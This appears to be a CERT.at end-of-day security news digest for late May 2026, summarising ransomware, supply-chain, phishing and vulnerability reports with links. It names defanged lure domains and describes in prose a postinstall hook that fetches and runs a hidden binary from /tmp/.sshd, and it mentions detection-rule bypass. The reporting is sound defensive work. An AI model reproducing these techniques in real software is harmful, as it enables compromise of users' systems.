End-of-Day report
Timeframe: Freitag 22-05-2026 18:00 - Dienstag 26-05-2026 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Alexander Riepl
News
Update #1: Qilin-Ransomware nutzt Initial Access aus ZipLine-Kampagne - DACH-Recruiting-Domains im Fokus
Uns sind weitere Köderdomains bekannt geworden, die demselben Muster folgen: valenzsearch[.]at, haasrecruiting[.]at, bergersearch[.]at
https://www.cert.at/de/aktuelles/2026/5/zipline-qilin-raas-update
Anthropic to release Mythos-class models to the public
Anthropic has revealed its intention to one day release models that match the performance of its Mythos bug-finding AI to the public, once it can make them safe.
https://www.theregister.com/security/2026/05/25/anthropic-to-release-mythos-class-models-to-the-public/5245596
Critical Ghost CMS Vulnerability Exploited to Hack 700+ Websites
A critical Ghost CMS vulnerability identified as CVE-2026-26980 has been exploited in a widespread cyber campaign that compromised more than 700 websites, including platforms associated with major institutions such as Harvard University, University of Oxford, and DuckDuckGo. [..] The flaw received a CVSS severity score of 9.4, highlighting the serious risks posed by CVE-2026-26980. The vulnerability was reportedly discovered by Anthropic using its Claude AI system. [..] Investigators noted that a DLL file involved in the campaign carried a compilation timestamp dated February 16, 2026 [..] The malicious activity was first detected on May 7, 2026.
https://thecyberexpress.com/cve-2026-26980-ghost-cms-vulnerability/
Github: Staged publishing and new install-time controls for NPM
Staged publishing is now generally available on npm. Instead of a direct publish that immediately makes a package version available to consumers, the prebuilt tarball is uploaded to a stage queue where a maintainer must explicitly approve it before it becomes installable.
https://github.blog/changelog/2026-05-22-staged-publishing-and-new-install-time-controls-for-npm/
Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects
Socket researchers identified a coordinated supply chain campaign affecting eight packages on Packagist whose upstream repositories were modified to include the same malicious postinstall script. The script attempted to download a Linux binary from a GitHub Releases URL, save it to /tmp/.sshd, make it executable, and run it in the background.
https://socket.dev/blog/malicious-postinstall-hook-found-across-700-github-repos
Fake software on GitHub and SourceForge distribute Deno RAT
We found fake installers and plugins for ChatGPT, Claude, AutoTune, and other popular software that can give attackers full control over your device. [..] The infection chain is usually started via MSI files or PowerShell scripts downloaded from GitHub or SourceForge in most of the analyzed cases.
https://www.malwarebytes.com/blog/threat-intel/2026/05/fake-software-on-github-and-sourceforge-distribute-deno-rat
Anruf, WhatsApp, QR-Code: Neue Phishing-Masche betrifft Erste Bank Kund:innen
Kriminelle geben sich aktuell als Mitarbeitende der Erste Bank aus und fordern ihre Opfer per WhatsApp dazu auf, einen Aktivierungs-QR-Code für George zu übermitteln. Wer den Code weitergibt, ermöglicht den Tätern Zugriff auf das Konto.
https://www.watchlist-internet.at/news/qr-code-erste-bank/
Betrüger verschicken seit Monaten Scam-Mails von offizieller Microsoft-Adresse
Betrüger können über eine offizielle E-Mailadresse von Microsoft Nachrichten verschicken. Über die selbe Adresse werden auch Codes für die Zwei-Faktor-Authentifzierung versendet. [..] Die genutzte Absenderadresse lautet "msonlineservicesteam@microsoftonline.com".
https://www.derstandard.at/story/3000000322088/betrueger-verschicken-seit-monaten-scam-mails-von-offizieller-microsoft-adresse
DBIR 2026: Sicherheitslücken als häufigstes Einfallstor für Angriffe
Obwohl der Bericht (DBIR 2026) noch auf Daten aus dem Jahr 2025 basiert und somit vor den jüngsten Fortschritten bei KI-Spitzenmodellen entstanden ist, sind die Trends eindeutig: KI verändert die Cybersicherheitsbranche grundlegend. [..] Fast ein Drittel (31 %) aller Sicherheitsverletzungen beginnt mit der Ausnutzung von Schwachstellen.
https://borncity.com/blog/2026/05/25/dbir-2026-sicherheitsluecken-sind-das-haeufigste-einfallstor-fuer-angriffe/
2 PhaaS 2 Furious: The Evolution of Chinese-language Phishing Services
While Russian-speaking threat actors have historically dominated the phishing-as-a-service (PhaaS) landscape, a rival ecosystem is rapidly growing within the Chinese-language underground.
https://cloud.google.com/blog/topics/threat-intelligence/chinese-language-phishing-services/
Six Signals for Threat Attribution
Credible threat attribution weighs six signals together. Each signal has a disciplined methodology behind it, with citations and stress tests to back the conclusions.
https://zeltser.com/six-signals-for-threat-attribution
Noroboto: Lying fonts and mitigation in Rust
The "noroboto.ttf" "lexploit" is straightforward: create a new malicious font definition which is embedded in a document according to the specification and lies about the Unicode representation of its glyphs.
https://tritium.legal/blog/noroboto
Detection Logic Bugs, Developing Context to Bypass MiniPlasma Rules
Recently, because of Nightmare-eclipse-s Green Plasma and MiniPlasma variants, it-s been a busy week. There are tons of community detection rules out there now. But as someone who practices Adversarial Detection Engineering, that is, hunting for bugs in detection logic, you know a small tweaks can bypass detection.
https://detect.fyi/detection-logic-bugs-developing-context-to-bypass-miniplasma-rules-903f1d7c68e8?source=rssd5fd8f494f6a4
Remove SPNs and Fix Kerberoasting
Remediate Kerberoasting vulnerabilities by removing SPNs for accounts that dont need them.
https://projectblack.io/blog/remove-spn-fix-kerberoasting/
NISG 2026: Der praktische 6-Monats-Fahrplan für österreichische Unternehmen
Der 1. Oktober 2026 ist kein weiches Zieldatum. Ab diesem Tag gilt das Netz- und Informationssystemsicherheitsgesetz NISG 2026 in Österreich vollumfänglich [..] Dieser Fahrplan zeigt konkret, was in den nächsten 6 Monaten zu tun ist: So, dass ein IT-Verantwortlicher oder eine Geschäftsführerin morgen damit beginnen kann.
https://www.zettasecure.com//post//nisg-2026-fahrplan-oesterreich
Vulnerabilities
Roundcube: Security updates 1.6.16 and 1.7.1 released
We just published security updates to the 1.6 LTS and 1.7 versions of Roundcube Webmail. They both contain fixes for recently reported security vulnerabilities.
https://roundcube.net/news/2026/05/24/security-updates-1.6.16-and-1.7.1
Debian SE Linux and PinTheft
PinTheft is a Linux local privilege escalation exploit for an RDS zerocopy double-free that can be turned into a page-cache overwrite through io_uring fixed buffers. [..] We duped on this bug with some other teams and a patch is available so we are releasing our PoC.
https://etbe.coker.com.au/2026/05/24/debian-selinux-pintheft/
Splunk: SVD-2026-0504: Denial of Service through coldToFrozen.sh Script in Splunk Enterprise
https://advisory.splunk.com//advisories/SVD-2026-0504
LWN: Security updates for Tuesday
https://lwn.net/Articles/1074443/
Synology-SA-26:10 Synology Chat Server
https://www.synology.com/en-global/support/security/Synology_SA_26_10
MISP 2.5.38 - UI and security update
https://www.misp-project.org/2026/05/26/misp.2.5.38.released.html/
Zyxel security advisory for missing authorization vulnerability in GS1200v3 series switches
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-missing-authorization-vulnerability-in-gs1200v3-series-switches-05-26-2026